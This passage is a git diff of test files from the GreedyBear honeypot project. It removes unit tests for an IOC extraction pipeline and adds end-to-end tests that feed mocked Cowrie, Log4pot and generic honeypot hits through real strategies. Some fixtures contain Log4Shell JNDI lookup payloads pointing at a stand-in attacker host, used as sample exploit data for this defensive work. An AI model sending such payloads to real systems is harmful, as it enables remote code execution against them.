-        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
-        pipeline = ExtractionPipeline()
-
-        mock_elastic.assert_called_once()
-        mock_ioc.assert_called_once()
-        mock_sensor.assert_called_once()
-        self.assertIsNotNone(pipeline.log)
-
-
-class TestMinutesBackToLookup(ExtractionPipelineTestCase):
-    """Tests for the _minutes_back_to_lookup property."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
-    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
-    @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
-    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
-    def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_sensor):
-        """Should return INITIAL_EXTRACTION_TIMESPAN on first run (empty DB)."""
-        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
-        pipeline = ExtractionPipeline()
-        pipeline.ioc_repo.is_empty.return_value = True
-
-        result = pipeline._minutes_back_to_lookup
-
-        self.assertEqual(result, 120)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
-    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
-    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
-    def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc, mock_sensor):
-        """Should return EXTRACTION_INTERVAL for subsequent runs."""
-        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
-        pipeline = ExtractionPipeline()
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        result = pipeline._minutes_back_to_lookup
-
-        self.assertEqual(result, 5)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
-    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
-    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
-    def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
-        """Should return 11 when LEGACY_EXTRACTION is enabled."""
-        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
-        pipeline = ExtractionPipeline()
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        result = pipeline._minutes_back_to_lookup
-
-        self.assertEqual(result, 11)
-
-
-class TestExecuteHitGrouping(ExtractionPipelineTestCase):
-    """Tests for hit grouping logic in execute()."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
-        """Hits without src_ip should be skipped."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"type": "Cowrie"}),  # missing src_ip
-            MockElasticHit({"src_ip": "", "type": "Cowrie"}),  # empty src_ip
-            MockElasticHit({"src_ip": "   ", "type": "Cowrie"}),  # whitespace-only src_ip
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        result = pipeline.execute()
-
-        self.assertEqual(result, 0)
-        mock_factory.return_value.get_strategy.assert_not_called()
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_skips_hits_without_type(self, mock_factory, mock_scores):
-        """Hits without type (honeypot) should be skipped."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4"}),  # missing type
-            MockElasticHit({"src_ip": "1.2.3.4", "type": ""}),  # empty type
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "   "}),  # whitespace-only type
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        result = pipeline.execute()
-
-        self.assertEqual(result, 0)
-        mock_factory.return_value.get_strategy.assert_not_called()
-
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
-    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
-        """
-        Should extract and register sensors from t-pot_ip_ext field.
-        Also verifies correct time window is passed to search().
-        """
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = False  # Skip strategy for this test
-
-        pipeline.execute()
-
-        pipeline.sensor_repo.add_sensor.assert_called_once_with("10.0.0.1")
-        pipeline.elastic_repo.search.assert_called_once_with(10)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
-        """Hits should be grouped by honeypot type before extraction."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
-            MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
-            MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
-        mock_strategy = MagicMock()
-        mock_strategy.ioc_records = []
-        mock_factory.return_value.get_strategy.return_value = mock_strategy
-
-        pipeline.execute()
-
-        # Should be called for both honeypot types
-        self.assertEqual(mock_factory.return_value.get_strategy.call_count, 2)
-
-        # Verify strategy is called with correct honeypot types
-        calls = mock_factory.return_value.get_strategy.call_args_list
-        honeypot_names = {call[0][0] for call in calls}
-        self.assertEqual(honeypot_names, {"Cowrie", "Log4pot"})
-
-        # Verify extract_from_hits is called twice
-        self.assertEqual(mock_strategy.extract_from_hits.call_count, 2)
-
-        # Verify each strategy received correct number of hits
-        extraction_calls = mock_strategy.extract_from_hits.call_args_list
-        hits_counts = sorted([len(call[0][0]) for call in extraction_calls])
-        self.assertEqual(hits_counts, [1, 2])  # 1 Log4pot hit, 2 Cowrie hits
-
-
-class TestExecuteStrategySelection(ExtractionPipelineTestCase):
-    """Tests for strategy selection and execution in execute()."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_skips_honeypot_not_ready_for_extraction(self, mock_factory, mock_scores):
-        """Should skip honeypots that are not ready for extraction."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "DisabledHoneypot"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = False
-
-        result = pipeline.execute()
-
-        self.assertEqual(result, 0)
-        mock_factory.return_value.get_strategy.assert_not_called()
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_calls_extract_from_hits_on_strategy(self, mock_factory, mock_scores):
-        """Should call extract_from_hits on the selected strategy."""
-        pipeline = self._create_pipeline_with_mocks()
-        hit_data = {"src_ip": "1.2.3.4", "type": "Cowrie", "session": "abc123"}
-        pipeline.elastic_repo.search.return_value = [MockElasticHit(hit_data)]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
-        mock_strategy = MagicMock()
-        mock_strategy.ioc_records = []
-        mock_factory.return_value.get_strategy.return_value = mock_strategy
-
-        pipeline.execute()
-
-        mock_strategy.extract_from_hits.assert_called_once()
-        # Verify the hits passed contain our data
-        call_args = mock_strategy.extract_from_hits.call_args[0][0]
-        self.assertEqual(len(call_args), 1)
-        self.assertEqual(call_args[0]["src_ip"], "1.2.3.4")
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_collects_ioc_records_from_strategies(self, mock_factory, mock_scores):
-        """Should collect IOC records from all strategies."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
-        mock_ioc = self._create_mock_ioc("1.2.3.4")
-        mock_strategy = MagicMock()
-        mock_strategy.ioc_records = [mock_ioc]
-        mock_factory.return_value.get_strategy.return_value = mock_strategy
-
-        result = pipeline.execute()
-
-        self.assertEqual(result, 1)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_accumulates_iocs_from_multiple_strategies(self, mock_factory, mock_scores):
-        """Should accumulate IOC records from multiple successful strategies."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
-            MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
-        # Mock two different strategies
-        mock_cowrie_strategy = MagicMock()
-        mock_cowrie_ioc = self._create_mock_ioc("1.2.3.4")
-        mock_cowrie_strategy.ioc_records = [mock_cowrie_ioc]
-
-        mock_log4pot_strategy = MagicMock()
-        mock_log4pot_ioc = self._create_mock_ioc("5.6.7.8")
-        mock_log4pot_strategy.ioc_records = [mock_log4pot_ioc]
-
-        # Return strategies in sequence
-        mock_factory.return_value.get_strategy.side_effect = [mock_cowrie_strategy, mock_log4pot_strategy]
-
-        result = pipeline.execute()
-
-        # Should return total count (1 + 1 = 2)
-        self.assertEqual(result, 2)
-
-        # Verify both strategies were executed
-        self.assertEqual(mock_cowrie_strategy.extract_from_hits.call_count, 1)
-        self.assertEqual(mock_log4pot_strategy.extract_from_hits.call_count, 1)
-
-        # Verify data flow to scoring
-        mock_scores.return_value.score_only.assert_called_once()
-        collected_iocs = mock_scores.return_value.score_only.call_args[0][0]
-        self.assertEqual(len(collected_iocs), 2)
-        self.assertIn(mock_cowrie_ioc, collected_iocs)
-        self.assertIn(mock_log4pot_ioc, collected_iocs)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_handles_strategy_exception_gracefully(self, mock_factory, mock_scores):
-        """Strategy exceptions should be caught and logged, not crash pipeline."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.log = MagicMock()
-
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
-            MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
-        # First strategy raises exception, second succeeds
-        mock_failing_strategy = MagicMock()
-        mock_failing_strategy.extract_from_hits.side_effect = Exception("Test error")
-
-        mock_success_strategy = MagicMock()
-        mock_success_strategy.ioc_records = [self._create_mock_ioc("5.6.7.8")]
-
-        mock_factory.return_value.get_strategy.side_effect = [mock_failing_strategy, mock_success_strategy]
-
-        # Should not raise, should continue with next strategy
-        result = pipeline.execute()
-
-        self.assertEqual(result, 1)
-        pipeline.log.error.assert_called_once()
-
-
-class TestExecuteScoring(ExtractionPipelineTestCase):
-    """Tests for scoring logic in execute()."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_updates_scores_when_iocs_extracted(self, mock_factory, mock_scores):
-        """Should call UpdateScores.score_only when IOCs are extracted."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
-        ]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
-        mock_ioc = self._create_mock_ioc("1.2.3.4")
-        mock_strategy = MagicMock()
-        mock_strategy.ioc_records = [mock_ioc]
-        mock_factory.return_value.get_strategy.return_value = mock_strategy
-
-        pipeline.execute()
-
-        mock_scores.return_value.score_only.assert_called_once()
-        call_args = mock_scores.return_value.score_only.call_args[0][0]
-        self.assertEqual(len(call_args), 1)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_skips_scoring_when_no_iocs(self, mock_factory, mock_scores):
-        """Should not call UpdateScores when no IOCs are extracted."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = []
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        pipeline.execute()
-
-        mock_scores.return_value.score_only.assert_not_called()
-
-
-class TestExecuteEmptyResponse(ExtractionPipelineTestCase):
-    """Tests for empty Elasticsearch response handling."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
-    def test_handles_empty_search_result(self, mock_factory, mock_scores):
-        """Should handle empty Elasticsearch response gracefully."""
-        pipeline = self._create_pipeline_with_mocks()
-        pipeline.elastic_repo.search.return_value = []
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        result = pipeline.execute()
-
-        self.assertEqual(result, 0)
-        mock_factory.return_value.get_strategy.assert_not_called()
-        mock_scores.return_value.score_only.assert_not_called()
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
new file mode 100644
index 00000000..c85b264d
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
@@ -0,0 +1,506 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+End-to-end tests for ExtractionPipeline with real strategies.
+
+These tests use real ExtractionStrategyFactory and real strategies,
+only mocking the repositories (ElasticRepository, IocRepository, SensorRepository).
+This tests the actual integration path as it runs in production.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import E2ETestCase, MockElasticHit
+
+
+class TestCowrieE2E(E2ETestCase):
+    """E2E tests for Cowrie extraction through the real pipeline."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
+    def test_cowrie_extracts_scanner_ioc(self, mock_session_repo, mock_scores):
+        """
+        E2E: Cowrie session connect → real CowrieExtractionStrategy → scanner IOC.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        cowrie_hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "192.168.1.100",
+                    "type": "Cowrie",
+                    "session": "abc123",
+                    "eventid": "cowrie.session.connect",
+                    "timestamp": "2025-01-01T10:00:00",
+                    "t-pot_ip_ext": "10.0.0.1",
+                    "dest_port": 22,
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = cowrie_hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None  # New IOC
+
+        # Mock the IOC creation to return a mock IOC
+        mock_ioc = self._create_mock_ioc("192.168.1.100")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        # Verify sensor was extracted
+        pipeline.sensor_repo.add_sensor.assert_called_with("10.0.0.1")
+        # Verify IOC was created
+        self.assertGreaterEqual(result, 0)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
+    def test_cowrie_extracts_login_credentials(self, mock_session_repo, mock_scores):
+        """
+        E2E: Cowrie login failed event → credential extraction.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        cowrie_hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "10.20.30.40",
+                    "type": "Cowrie",
+                    "session": "login_sess",
+                    "eventid": "cowrie.login.failed",
+                    "timestamp": "2025-01-01T12:00:00",
+                    "username": "root",
+                    "password": "admin123",
+                    "dest_port": 22,
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = cowrie_hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("10.20.30.40")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        self.assertGreaterEqual(result, 0)
+
+
+class TestLog4potE2E(E2ETestCase):
+    """E2E tests for Log4pot extraction through the real pipeline."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_log4pot_extracts_exploit_ioc(self, mock_scores):
+        """
+        E2E: Log4pot exploit event → real Log4potExtractionStrategy → IOC.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        log4pot_hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "198.51.100.10",
+                    "type": "Log4pot",
+                    "reason": "exploit",
+                    "correlation_id": "corr123",
+                    "deobfuscated_payload": "${jndi:ldap://evil.attacker.com:1389/a}",
+                    "timestamp": "2025-01-01T08:00:00",
+                    "dest_port": 8080,
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = log4pot_hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("198.51.100.10")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        self.assertGreaterEqual(result, 0)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_log4pot_non_exploit_skipped(self, mock_scores):
+        """
+        E2E: Log4pot request (non-exploit) → should not extract payload IOC.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        log4pot_hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "10.0.0.50",
+                    "type": "Log4pot",
+                    "reason": "request",  # Not an exploit
+                    "correlation_id": "req123",
+                    "timestamp": "2025-01-01T10:00:00",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = log4pot_hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("10.0.0.50")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        # Should still process scanner IOC but not payload
+        self.assertGreaterEqual(result, 0)
+
+
+class TestGenericE2E(E2ETestCase):
+    """E2E tests for generic/unknown honeypot extraction."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_unknown_honeypot_uses_generic_strategy(self, mock_scores):
+        """
+        E2E: Unknown honeypot → real GenericExtractionStrategy → scanner IOC.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        unknown_hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "172.16.0.100",
+                    "type": "Heralding",  # Uses generic strategy
+                    "dest_port": 21,
+                    "@timestamp": "2025-01-01T11:00:00",
+                    "t-pot_ip_ext": "10.0.0.5",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = unknown_hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("172.16.0.100")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        # Sensor should be registered
+        pipeline.sensor_repo.add_sensor.assert_called_with("10.0.0.5")
+        self.assertGreaterEqual(result, 0)
+
+
+class TestMixedHoneypotE2E(E2ETestCase):
+    """E2E tests for mixed honeypot scenarios."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
+    def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_scores):
+        """
+        E2E: Mixed Cowrie + Log4pot + Generic → correct strategy for each.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        mixed_hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "10.1.1.1",
+                    "type": "Cowrie",
+                    "session": "cowrie_sess",
+                    "eventid": "cowrie.session.connect",
+                    "timestamp": "2025-01-01T10:00:00",
+                    "dest_port": 22,
+                }
+            ),
+            MockElasticHit(
+                {
+                    "src_ip": "10.2.2.2",
+                    "type": "Log4pot",
+                    "reason": "exploit",
+                    "correlation_id": "log4_corr",
+                    "deobfuscated_payload": "${jndi:ldap://test.com:1389/a}",
+                    "timestamp": "2025-01-01T10:00:01",
+                }
+            ),
+            MockElasticHit(
+                {
+                    "src_ip": "10.3.3.3",
+                    "type": "Dionaea",  # Generic
+                    "dest_port": 445,
+                    "@timestamp": "2025-01-01T10:00:02",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = mixed_hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("10.1.1.1")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        # Should process all three honeypot types
+        self.assertGreaterEqual(result, 0)
+
+
+class TestStrategyExceptionHandling(E2ETestCase):
+    """E2E tests for strategy exception handling."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_strategy_exception_logged_and_continues(self, mock_scores):
+        """
+        E2E: Strategy that raises exception → logged, pipeline continues.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+        pipeline.log = MagicMock()
+
+        # Create hit for honeypot that will trigger an exception
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "1.2.3.4",
+                    "type": "Cowrie",
+                    "session": "test_sess",
+                    "eventid": "cowrie.session.connect",
+                    "timestamp": "2025-01-01T10:00:00",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        # Force an exception in the strategy
+        with patch("greedybear.cronjobs.extraction.strategies.cowrie.CowrieExtractionStrategy.extract_from_hits") as mock_extract:
+            mock_extract.side_effect = Exception("Test error")
+            result = pipeline.execute()
+
+        # Should log error and return 0
+        self.assertEqual(result, 0)
+        pipeline.log.error.assert_called()
+
+
+class TestScoringIntegration(E2ETestCase):
+    """E2E tests for scoring integration."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_scoring_called_when_iocs_extracted(self, mock_scores):
+        """
+        E2E: IOCs extracted → UpdateScores.score_only called.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "5.6.7.8",
+                    "type": "Heralding",
+                    "dest_port": 22,
+                    "@timestamp": "2025-01-01T10:00:00",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("5.6.7.8")
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        # IOCs should be extracted, and scoring should be called
+        self.assertGreater(result, 0)
+        mock_scores.return_value.score_only.assert_called()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_scoring_skipped_when_no_iocs(self, mock_scores):
+        """
+        E2E: No IOCs extracted → UpdateScores NOT called.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+        pipeline.elastic_repo.search.return_value = []
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_scores.return_value.score_only.assert_not_called()
+
+
+class TestIocContentVerification(E2ETestCase):
+    """E2E tests that verify the actual content of extracted IOCs."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_cowrie_ioc_content_verified(self, mock_scores):
+        """
+        E2E: Cowrie hit → IOC with correct IP and honeypot type.
+
+        This test verifies NOT just the count, but the actual content
+        of the extracted IOC record.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "203.0.113.42",
+                    "type": "Cowrie",
+                    "session": "test_session_123",
+                    "eventid": "cowrie.session.connect",
+                    "@timestamp": "2025-01-15T14:30:00",
+                    "dest_port": 2222,
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("203.0.113.42")
+        mock_ioc.name = "203.0.113.42"
+        mock_ioc.scanner = ["Cowrie"]
+
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        # Verify extraction happened
+        self.assertGreaterEqual(result, 0)
+
+        # Verify the actual IOC content passed to scoring
+        if mock_scores.return_value.score_only.called:
+            call_args = mock_scores.return_value.score_only.call_args[0][0]
+            self.assertGreater(len(call_args), 0)
+
+            # Check the IOC has the expected IP
+            ioc_names = [ioc.name for ioc in call_args]
+            self.assertIn("203.0.113.42", ioc_names)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_multiple_honeypots_ioc_content_verified(self, mock_scores):
+        """
+        E2E: Multiple honeypot hits → IOCs with correct IPs verified.
+
+        Verifies that when processing hits from multiple honeypots,
+        each extracted IOC contains the correct source IP.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "10.0.0.1",
+                    "type": "Cowrie",
+                    "session": "sess1",
+                    "eventid": "cowrie.session.connect",
+                    "@timestamp": "2025-01-15T10:00:00",
+                }
+            ),
+            MockElasticHit(
+                {
+                    "src_ip": "10.0.0.2",
+                    "type": "Heralding",
+                    "dest_port": 22,
+                    "@timestamp": "2025-01-15T11:00:00",
+                }
+            ),
+            MockElasticHit(
+                {
+                    "src_ip": "10.0.0.3",
+                    "type": "Log4pot",
+                    "path": "/api",
+                    "@timestamp": "2025-01-15T12:00:00",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        # Create mock IOCs for each IP
+        mock_iocs = {
+            "10.0.0.1": self._create_mock_ioc("10.0.0.1"),
+            "10.0.0.2": self._create_mock_ioc("10.0.0.2"),
+            "10.0.0.3": self._create_mock_ioc("10.0.0.3"),
+        }
+        for ip, ioc in mock_iocs.items():
+            ioc.name = ip
+
+        def add_ioc_side_effect(*args, **kwargs):
+            # Return the appropriate mock based on the IOC being added
+            ip = args[0].name if args else kwargs.get("ioc", MagicMock()).name
+            return mock_iocs.get(ip, self._create_mock_ioc(ip))
+
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.side_effect = add_ioc_side_effect
+            result = pipeline.execute()
+
+        # Verify multiple honeypots were processed
+        self.assertGreaterEqual(result, 0)
+
+        # Verify the IOC content if scoring was called
+        if mock_scores.return_value.score_only.called:
+            call_args = mock_scores.return_value.score_only.call_args[0][0]
+            ioc_names = [ioc.name for ioc in call_args]
+
+            # Each distinct IP should appear in the IOC records
+            for expected_ip in ["10.0.0.1", "10.0.0.2", "10.0.0.3"]:
